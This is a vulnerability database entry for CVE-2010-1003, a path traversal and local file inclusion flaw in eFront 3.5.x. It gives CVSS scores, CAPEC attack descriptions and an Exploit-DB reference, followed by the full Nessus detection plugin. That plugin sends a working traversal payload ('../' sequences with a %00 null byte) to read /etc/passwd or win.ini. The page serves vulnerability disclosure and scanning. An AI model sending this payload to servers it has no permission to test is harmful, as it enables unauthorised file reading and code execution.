Vulnerabilities > CVE-2010-1003 - Path Traversal vulnerability in Efrontlearning Efront

047910
CVSS 6.8 - MEDIUM
Attack vector
NETWORK
Attack complexity
MEDIUM
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL
network
efrontlearning
CWE-22
nessus
exploit available

Summary

Directory traversal vulnerability in www/editor/tiny_mce/langs/language.php in eFront 3.5.x through 3.5.5 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the langname parameter.

Common Attack Pattern Enumeration and Classification (CAPEC)

  • Relative Path Traversal
    An attacker exploits a weakness in input validation on the target by supplying a specially constructed path utilizing dot and slash characters for the purpose of obtaining access to arbitrary files or resources. An attacker modifies a known path on the target in order to reach material that is not available through intended channels. These attacks normally involve adding additional path separators (/ or \) and/or dots (.), or encodings thereof, in various combinations in order to reach parent directories or entirely separate trees of the target's directory structure.
  • Directory Traversal
    An attacker with access to file system resources, either directly or via application logic, will use various file path specification or navigation mechanisms such as ".." in path strings and absolute paths to extend their range of access to inappropriate areas of the file system. The attacker attempts to either explore the file system for recon purposes or access directories and files that are intended to be restricted from their access. Exploring the file system can be achieved through constructing paths presented to directory listing programs, such as "ls" and 'dir', or through specially crafted programs that attempt to explore the file system. The attacker engaging in this type of activity is searching for information that can be used later in a more exploitive attack. Access to restricted directories or files can be achieved through modification of path references utilized by system applications.
  • File System Function Injection, Content Based
    An attack of this type exploits the host's trust in executing remote content including binary files. The files are poisoned with a malicious payload (targeting the file systems accessible by the target software) by the attacker and may be passed through standard channels such as via email, and standard web content like PDF and multimedia files. The attacker exploits known vulnerabilities or handling routines in the target processes. Vulnerabilities of this type have been found in a wide variety of commercial applications from Microsoft Office to Adobe Acrobat and Apple Safari web browser. When the attacker knows the standard handling routines and can identify vulnerabilities and entry points they can be exploited by otherwise seemingly normal content. Once the attack is executed, the attackers' program can access relative directories such as C:\Program Files or other standard system directories to launch further attacks. In a worst case scenario, these programs are combined with other propagation logic and work as a virus.
  • Using Slashes and URL Encoding Combined to Bypass Validation Logic
    This attack targets the encoding of the URL combined with the encoding of the slash characters. An attacker can take advantage of the multiple way of encoding an URL and abuse the interpretation of the URL. An URL may contain special character that need special syntax handling in order to be interpreted. Special characters are represented using a percentage character followed by two digits representing the octet code of the original character (%HEX-CODE). For instance US-ASCII space character would be represented with %20. This is often referred as escaped ending or percent-encoding. Since the server decodes the URL from the requests, it may restrict the access to some URL paths by validating and filtering out the URL requests it received. An attacker will try to craft an URL with a sequence of special characters which once interpreted by the server will be equivalent to a forbidden URL. It can be difficult to protect against this attack since the URL can contain other format of encoding such as UTF-8 encoding, Unicode-encoding, etc.
  • Manipulating Input to File System Calls
    An attacker manipulates inputs to the target software which the target software passes to file system calls in the OS. The goal is to gain access to, and perhaps modify, areas of the file system that the target software did not intend to be accessible.

Exploit-Db

descriptioneFront 3.5.5 'langname' Parameter Local File Include Vulnerability. CVE-2010-1003. Webapps exploit for php platform
idEDB-ID:33769
last seen2016-02-03
modified2010-03-17
published2010-03-17
reporter7Safe
sourcehttps://www.exploit-db.com/download/33769/
titleeFront 3.5.5 - 'langname' Parameter Local File Include Vulnerability

Nessus

NASL familyCGI abuses
NASL idEFRONT_LANGNAME_LFI.NASL
descriptionThe version of eFront running on the remote web server is affected by a local file inclusion vulnerability due to improper sanitization of user-supplied input to the
last seen2020-06-01
modified2020-06-02
plugin id45120
published2010-03-22
reporterThis script is Copyright (C) 2010-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
sourcehttps://www.tenable.com/plugins/nessus/45120
titleeFront 'langname' Parameter Traversal Local File Inclusion
code
#
# (C) Tenable Network Security, Inc.
#


include("compat.inc");


if (description)
{
  script_id(45120);
  script_version("1.15");
 script_cvs_date("Date: 2018/11/28 22:47:41");

  script_cve_id("CVE-2010-1003");
  script_bugtraq_id(38787);

  script_name(english:"eFront 'langname' Parameter Traversal Local File Inclusion");
  script_summary(english:"Attempts to read a local file.");

  script_set_attribute(attribute:"synopsis", value:
"A PHP application running on the remote web server is affected by a
local file inclusion vulnerability.");
  script_set_attribute(attribute:"description", value:
"The version of eFront running on the remote web server is affected by
a local file inclusion vulnerability due to improper sanitization of
user-supplied input to the 'langname' parameter of the language.php
script before using it to include PHP code.

Regardless of PHP's 'register_globals' setting, an unauthenticated,
remote attacker can exploit the issue to view arbitrary files or to
execute arbitrary PHP code on the remote host, subject to the
privileges of the web server user id.");
  script_set_attribute(attribute:"see_also", value:"http://www.coresecurity.com/content/efront-php-file-inclusion");
  script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2010/Mar/155");
  script_set_attribute(attribute:"see_also", value:"http://old.efrontlearning.net/download/download-efront.html");
  script_set_attribute(attribute:"solution", value:
"Upgrade to eFront 3.5.5 Build 6301 or later. Alternatively, apply the
patch referenced in the vendor advisory.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"d2_elliot_name", value:"eFront 3.5.5 LFI");
  script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2010/03/16");
  script_set_attribute(attribute:"patch_publication_date", value:"2010/03/14");
  script_set_attribute(attribute:"plugin_publication_date", value:"2010/03/22");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:efrontlearning:efront");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2010-2018 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("efront_detect.nbin", "os_fingerprint.nasl");
  script_require_keys("www/PHP", "installed_sw/eFront");
  script_require_ports("Services/www", 80);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("install_func.inc");

app = "eFront";
get_install_count(app_name:app, exit_if_zero:TRUE);

port = get_http_port(default:80, php:TRUE);

install = get_single_install(
  app_name : app,
  port     : port
);

dir = install['path'];
install_url = build_url(port:port, qs:dir);

# Determine what to look for.
os = get_kb_item("Host/OS");
if (os && report_paranoia < 2)
{
  if ("Windows" >< os)
    files = make_list('/windows/win.ini','/winnt/win.ini');
  else
    files = make_list('/etc/passwd');
}
else files = make_list('/etc/passwd', '/windows/win.ini', '/winnt/win.ini');

file_pats = make_array();
file_pats['/etc/passwd'] = "root:.*:0:[01]:";
file_pats['/winnt/win.ini'] = "^\[[a-zA-Z\s]+\]|^; for 16-bit app support";
file_pats['/windows/win.ini'] = "^\[[a-zA-Z\s]+\]|^; for 16-bit app support";

traversal = crap(data:"../", length:3*9) + '..';

# Loop through files to look for.
foreach file (files)
{
  # Try to exploit the issue.
  url = '/editor/tiny_mce/langs/language.php?' +
    'langname=a/' + traversal + file + '%00';

  res = http_send_recv3(port:port, method:"GET", item:dir+url, exit_on_fail:TRUE);

  # There's a problem if...
  body = res[2];
  file_pat = file_pats[file];
  if (
    !isnull(body) &&
    (
      # we see the expected contents or...
      egrep(pattern:file_pat, string:body) ||
      # we get an error because magic_quotes was enabled or...
      traversal+file+"\0.php.inc" >< body ||
      # we get an error claiming the file doesn't exist or...
      traversal+file+"): failed to open stream: No such file" >< body ||
      traversal+file+") [function.include-once]: failed to open stream: No such file" >< body ||
      traversal+file+") [<a href='function.include-once'>function.include-once</a>]: failed to open stream: No such file" >< body ||
      # we get an error about open_basedir restriction.
      traversal+file+") [function.include_once]: failed to open stream: Operation not permitted" >< body ||
      traversal+file+") [<a href='function.include-once'>function.include-once</a>]: failed to open stream: Operation not permitted" >< body ||
      "open_basedir restriction in effect. File("+traversal+file >< body
    )
  )
  {
    vuln = TRUE;
    output = NULL;
    errors = FALSE;

    if (egrep(pattern:file_pat, string:body))
    {
      pos = stridx(body, "<b");
      if (pos > 0 && !empty_or_null(pos))
      {
        output = substr(body, 0, (pos - 1));
        if (empty_or_null(output)) output = chomp(body);
      }
      else output = chomp(body);
      break;
    }
    else
    {
      errors = TRUE;
      break;
    }
  }
}
if (!vuln)
  audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url);

if (errors)
{
  if (report_verbosity > 0)
  {
    report =
      '\nNessus was not able to exploit the issue, but was able to verify'+
      ' it' + '\nexists by examining the error message returned from the' +
      ' following' + '\nrequest :' +
      '\n' +
      '\n' + install_url + url +
      '\n';
    security_warning(port:port, extra:report);
  }
  else security_warning(port);
}
else
{
  security_report_v4(
    port        : port,
    severity    : SECURITY_WARNING,
    file        : file,
    request     : make_list(install_url + url),
    output      : chomp(output),
    attach_type : 'text/plain'
  );
  exit(0);
}